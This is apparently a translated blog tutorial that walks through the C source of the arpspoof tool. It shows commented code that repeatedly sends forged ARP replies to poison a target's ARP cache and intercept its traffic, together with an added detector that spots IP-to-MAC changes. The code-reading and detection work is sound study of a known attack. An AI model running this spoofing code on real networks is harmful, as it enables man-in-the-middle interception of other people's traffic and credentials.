ARPspoof source code can be viewed in an easy way.

Source: Internet
Author: User


Preface

If you only want to use the tool as a hacker would, ignore everything that follows. If your goal is to have your own penetration testing tools and to write your own xxxtools, reading the source code of a few simple tools will be of great benefit.

Background

Today I was bored, so I put some painstaking effort into analyzing the source code of a small tool.

I am also a hacker, but I have some network programming skills and have long been determined not to be a hacker who only uses tools, so my target this evening is the much-abused ARPspoof.

To be honest, I really don't like the so-called "magic" hacking tools. So today we will take a knife to ARPspoof and see how many "terrible things" are hidden inside this trick of a tool.

First of all, I have read some articles about ARP attacks on FreeBuf. I think I understand them, but I am a beginner (not deeply versed in TCP/IP; readers with weak network knowledge may find this hard going), so I am going to give a simple, limited explanation of this problem, and if there are gaps or errors in the article, please point them out.

The core code of ARPspoof has not changed, so let's get started! However, the source code of ARPspoof keeps being restructured with every version update, so I picked a relatively stable version to read.

Supplementing some basic knowledge, the easy way

Before that, please allow me to add some basic knowledge.

What ARP does: after a computer joins the network, it broadcasts an ARP packet to announce its identity (IP address, MAC address and so on). If ARP is maliciously hijacked, we get the familiar ARP poisoning or ARP hijacking. To make this easier to understand, think of the ID card we use every day: if someone takes your ID card, can they use it to open an account, launder money or do other bad things? Exactly. ARP can be seen the same way. The analogy is not perfectly accurate, but it is enough for understanding this tool within the scope of this article.

The libnet library. This is a magic library that lets you work directly at the link layer. If you are tired of using sockets, take a look at libnet. You can also guess that sending a large number of link-layer datagrams may cause network instability and other problems, which is the flood attack; is that how a DDoS attack is implemented? I am still very interested in getting to the bottom of that question. To put it bluntly, we will see how libnet is used in arpspoof.

This article assumes the most basic networking knowledge and basic Linux programming knowledge. So can we start now? No, no, no.

Think like a hacker

I also need to say a little about ARP hijacking:

I searched the Internet at random for an example of ARP hijacking (the screenshot is missing here; the original credits Baidu). In fact, there is nothing mysterious about it, but it works well.

That is not what I want to talk about, though. I personally divide ARP attacks into two types: 1. ARP disconnection (cutting the target off the network) and 2. ARP hijacking. When ARP disconnection succeeds, the practical effect is that the attacked host treats the attacker's machine as the gateway and sends all of its packets to the attacker. In theory, you can then get every packet it sends (including passwords???), although the passwords are very likely encrypted.

So what do we do with the packets the victim sends us? Just look at them? On its own that seems of little use (there is no reply, so the victim keeps re-sending request packets and no data exchange takes place; such packets are actually meaningless). So we can try to disguise ourselves: the simplest way is to spoof the gateway as well? Bingo! Correct. But is spoofing the gateway again enough? The victim's packets you received still have not been delivered... The real solution is port redirection; the specific implementation is not the focus here.

With that, let's look at the source code of the arpspoof tool. Now we can officially start!

Starting from the main function

First of all, don't panic. I have added a lot of comments, and the whole tool is only about 400 lines. Let's start with the main function:

To keep things from getting too tense, I put a detailed explanation into the source code comments to help students with a weaker foundation:

/*
 * File preamble of dsniff's arpspoof.c (includes, globals and forward
 * declarations), which the post left out; it is restored here so the
 * functions below read as one file. The bodies of usage() and arp_find()
 * are not reproduced in this article.
 */
#include <sys/types.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <err.h>
#include <libnet.h>   /* libnet 1.0 API: link interface + caller-supplied packet buffer */
#include <pcap.h>
#include "arp.h"      /* arp_cache_lookup(), used by arp_find() */

extern char *ether_ntoa(struct ether_addr *);

static struct libnet_link_int *llif;        /* link-layer handle opened in main() */
static struct ether_addr spoof_mac, target_mac;
static in_addr_t spoof_ip, target_ip;
static char *intf;                          /* interface name (-i) */

static void usage(void);                    /* prints the usage line and exits */
static int  arp_find(in_addr_t ip, struct ether_addr *mac); /* ARP cache lookup with retries */
static int  arp_send(struct libnet_link_int *llif, char *dev, int op,
                     u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa);
static void cleanup(int sig);

int
main(int argc, char *argv[])
{
    int c;
    char ebuf[PCAP_ERRBUF_SIZE];

    intf = NULL;
    spoof_ip = target_ip = 0;

    /*
     * About getopt: it parses the command-line arguments. argc and argv
     * come straight from main; the third parameter, "i:t:h?V", describes
     * the options the program accepts. A colon after a letter means that
     * option takes a value (-i and -t here), and getopt stores that value
     * in the global variable optarg. With that, the while loop below is
     * easy to follow.
     */
    while ((c = getopt(argc, argv, "i:t:h?V")) != -1) {
        switch (c) {
        case 'i':
            intf = optarg;
            break;
        case 't':
            /* libnet_name_resolve resolves a DNS name (or dotted IP) and
               returns the address, which is stored in target_ip */
            if ((target_ip = libnet_name_resolve(optarg, 1)) == -1)
                usage();
            break;
        default:
            usage();
        }
    }
    argc -= optind;
    argv += optind;

    if (argc != 1)
        usage();

    /* the one remaining argument is the host whose IP we will claim */
    if ((spoof_ip = libnet_name_resolve(argv[0], 1)) == -1)
        usage();

    /*
     * pcap_lookupdev, as its name suggests, is the pcap function that finds
     * a usable network device on the local machine. It is only called when
     * no -i interface was given (intf == NULL); ebuf receives any error text.
     */
    if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL)
        errx(1, "%s", ebuf);

    /* libnet_open_link_interface (from libnet) opens the link-layer device
       named by intf; on failure the error message is stored in ebuf */
    if ((llif = libnet_open_link_interface(intf, ebuf)) == 0)
        errx(1, "%s", ebuf);

    /* if a target was given (-t) but arp_find cannot resolve its MAC, give up */
    if (target_ip != 0 && !arp_find(target_ip, &target_mac))
        errx(1, "couldn't arp for host %s",
             libnet_host_lookup(target_ip, 0));

    /* signal handling: skip this if you are not familiar with it, or take
       a closer look if you are interested; it is not the focus of this
       article (cleanup is shown at the end) */
    signal(SIGHUP, cleanup);
    signal(SIGINT, cleanup);
    signal(SIGTERM, cleanup);

    for (;;) {
        /* the core module: arp_send builds and sends the forged ARP reply;
           how it works is covered below */
        arp_send(llif, intf, ARPOP_REPLY, NULL, spoof_ip,
                 (target_ip ? (u_char *)&target_mac : NULL),
                 target_ip);
        sleep(2);
    }
    /* NOTREACHED */

    exit(0);
}

After going through everything in the main function, we find there is no mystery. It is really very simple programming; the specific functions are explained in the comments.

Debut of core functions

Next, let's look at how it sends ARP packets. After reading the source, you will see there is really nothing technically deep about it:

/*
 * The core of ARP packet sending. The parameters, for convenience:
 *   llif  libnet link-layer interface; through it we operate on the link layer
 *   dev   interface name (given with -i or found by pcap_lookupdev)
 *   op    the ARP operation (ARPOP_REQUEST or ARPOP_REPLY)
 *   sha   sender hardware address    spa   sender (IP) address
 *   tha   target hardware address    tpa   target (IP) address
 */
static int
arp_send(struct libnet_link_int *llif, char *dev,
         int op, u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa)
{
    char ebuf[128];
    u_char pkt[60];

    /* no sender MAC given: take the MAC of dev from the link layer */
    if (sha == NULL &&
        (sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {
        return (-1);
    }
    /* no sender IP given: take the IP of dev */
    if (spa == 0) {
        if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)
            return (-1);
        spa = htonl(spa); /* XXX */
    }
    /* no target MAC given: use the broadcast address ff:ff:ff:ff:ff:ff */
    if (tha == NULL)
        tha = "\xff\xff\xff\xff\xff\xff";

    /*
     * libnet_build_ethernet(dst, src, type, payload, payload_s, buf)
     * builds an Ethernet header into buf: destination MAC, source MAC,
     * upper-layer protocol type (ETHERTYPE_ARP here), optional payload
     * (usually NULL, 0). This is the libnet 1.0 form used by arpspoof;
     * the libnet 1.1 form instead takes a libnet_t handle (from
     * libnet_init) and a protocol tag ptag (0 for a new packet, the
     * previous return value when rebuilding it) and returns the tag,
     * or -1 on failure.
     */
    libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);

    /*
     * libnet_build_arp(hrd, pro, hln, pln, op, sha, spa, tha, tpa,
     *                  payload, payload_s, buf) builds the ARP header
     * right after the Ethernet header (pkt + ETH_H):
     *   hrd  hardware address format, ARPHRD_ETHER (Ethernet)
     *   pro  protocol address format, ETHERTYPE_IP
     *   hln  hardware address length (6)    pln  protocol address length (4)
     *   op   1 ARP request, 2 ARP reply, 3 RARP request, 4 RARP reply
     *   sha/spa  sender MAC and IP          tha/tpa  target MAC and IP
     *   payload/payload_s  usually NULL and 0
     * (the 1.1 form again adds the libnet handle and ptag and returns
     * the tag or -1)
     */
    libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,
                     op, sha, (u_char *)&spa, tha, (u_char *)&tpa,
                     NULL, 0, pkt + ETH_H);

    /* what follows is only the echo you see on the terminal */
    fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)sha));
    if (op == ARPOP_REQUEST) {
        fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
                ether_ntoa((struct ether_addr *)tha),
                libnet_host_lookup(tpa, 0),
                libnet_host_lookup(spa, 0));
    } else {
        fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
                ether_ntoa((struct ether_addr *)tha),
                libnet_host_lookup(spa, 0));
        fprintf(stderr, "%s\n", ether_ntoa((struct ether_addr *)sha));
    }
    /* write the frame to the wire; success means every byte went out */
    return (libnet_write_link_layer(llif, dev, pkt, sizeof(pkt)) == sizeof(pkt));
}

We can see there is really nothing amazing here, right?
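The frame arp_send() writes is a plain 42-byte Ethernet+ARP packet, and the only thing a forged reply changes is the MAC that a sender IP "is-at". That is also what a passive monitor keys on. As an added example (not part of the original post or of dsniff), here is a parser for that frame layout plus an arpwatch-style check that flags a known IP showing up with a new MAC; the frames, addresses and the demo() function are constructed here for illustration.

```c
#include <stdint.h>
#include <string.h>
#define ETH_H 14          /* Ethernet header length, same name as in dsniff */
#define ARP_FRAME_LEN 42  /* 14-byte Ethernet + 28-byte ARP: the "42" in "0806 42" */
struct arp_info { uint16_t op; uint8_t sha[6]; uint32_t spa; };

/* Decode an Ethernet/IPv4 ARP frame (RFC 826 layout): 1 on success, 0 if it is not one. */
int arp_parse(const uint8_t *f, size_t len, struct arp_info *out)
{
    if (len < ARP_FRAME_LEN || f[12] != 0x08 || f[13] != 0x06) return 0;   /* EtherType 0806 */
    const uint8_t *a = f + ETH_H;
    if (a[0] != 0 || a[1] != 1 || a[2] != 0x08 || a[3] != 0x00) return 0;  /* hrd=ether, pro=IP */
    if (a[4] != 6 || a[5] != 4) return 0;                                  /* hln=6, pln=4 */
    out->op = (uint16_t)((a[6] << 8) | a[7]);                              /* 1 request, 2 reply */
    memcpy(out->sha, a + 8, 6);                                            /* sender MAC */
    out->spa = ((uint32_t)a[14] << 24) | (a[15] << 16) | (a[16] << 8) | a[17]; /* sender IP */
    return 1;
}

/* arpwatch-style IP -> MAC table: returns 1 when a known sender IP arrives with a new MAC,
 * which is what the forged reply arp_send() repeats every 2 seconds looks like on the wire. */
#define MAX_ENTRIES 16
static struct { uint32_t ip; uint8_t mac[6]; } table[MAX_ENTRIES]; static int nentries;
int arp_watch(const struct arp_info *in)
{
    for (int i = 0; i < nentries; i++)
        if (table[i].ip == in->spa) return memcmp(table[i].mac, in->sha, 6) != 0;
    if (nentries < MAX_ENTRIES) {                        /* first sighting: learn it */
        table[nentries].ip = in->spa;
        memcpy(table[nentries++].mac, in->sha, 6);
    }
    return 0;
}

/* Constructed sample: a broadcast ARP reply "spa is-at sha", laid out like arp_send()'s pkt[]. */
static void sample_reply(uint8_t *f, const uint8_t *sha, uint32_t spa)
{
    static const uint8_t hdr[8] = { 0,1, 0x08,0x00, 6,4, 0,2 };  /* hrd, pro, hln, pln, op=reply */
    memset(f, 0, ARP_FRAME_LEN); memset(f, 0xff, 6); memcpy(f + 6, sha, 6);
    f[12] = 0x08; f[13] = 0x06; memcpy(f + ETH_H, hdr, 8); memcpy(f + ETH_H + 8, sha, 6);
    for (int i = 0; i < 4; i++) f[ETH_H + 14 + i] = (uint8_t)(spa >> (24 - 8 * i));
}

/* Two constructed replies for 192.168.1.1: the second one, with a different MAC, must alert. */
int demo(void)
{
    static const uint8_t real_mac[6] = { 0x00,0x11,0x22,0x33,0x44,0x55 }, fake_mac[6] = { 0xaa,0xbb,0xcc,0xdd,0xee,0xff };
    uint8_t f[ARP_FRAME_LEN]; struct arp_info info; int alerts = 0;
    sample_reply(f, real_mac, 0xC0A80101u); if (arp_parse(f, sizeof f, &info)) alerts += arp_watch(&info);
    sample_reply(f, fake_mac, 0xC0A80101u); if (arp_parse(f, sizeof f, &info)) alerts += arp_watch(&info);
    return alerts;   /* 1 */
}
```

On a real interface the same two functions would be fed from a pcap capture filtered on EtherType 0x0806; a gateway IP whose MAC flips back and forth every couple of seconds is the pattern this tool leaves behind.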
Tail

/*
 * All three signals are wired to cleanup. It is easy to understand: if the
 * real MAC of spoof_ip can be resolved with arp_find, the correct
 * "spoof_ip is-at spoof_mac" reply is sent three times before exiting.
 * Why not just stop immediately? Because those three genuine replies put
 * the target's ARP entry back, so the tool always leaves some buffer time.
 * Note the main loop sleeps 2 seconds between packets; this one sleeps 1.
 */
static void
cleanup(int sig)
{
    int i;

    if (arp_find(spoof_ip, &spoof_mac)) {
        for (i = 0; i < 3; i++) {
            /* XXX - on BSD, requires ETHERSPOOF kernel. */
            /* (comment from the original author: on BSD systems this
               needs a kernel built with the ETHERSPOOF option) */
            arp_send(llif, intf, ARPOP_REPLY,
                     (u_char *)&spoof_mac, spoof_ip,
                     (target_ip ? (u_char *)&target_mac : NULL),
                     target_ip);
            sleep(1);
        }
    }
    exit(0);
}

So what is left that we don't understand? In the article Man-in-the-middle attack: ARP poisoning (http://www.bkjia.com/Article/201207/144532.html), the arpspoof tool was demystified in just this way. Do you start to feel that there is actually nothing magical here? This is our "magic" hacking tool.


If you have any insights, I hope you will not hesitate to share them ~~
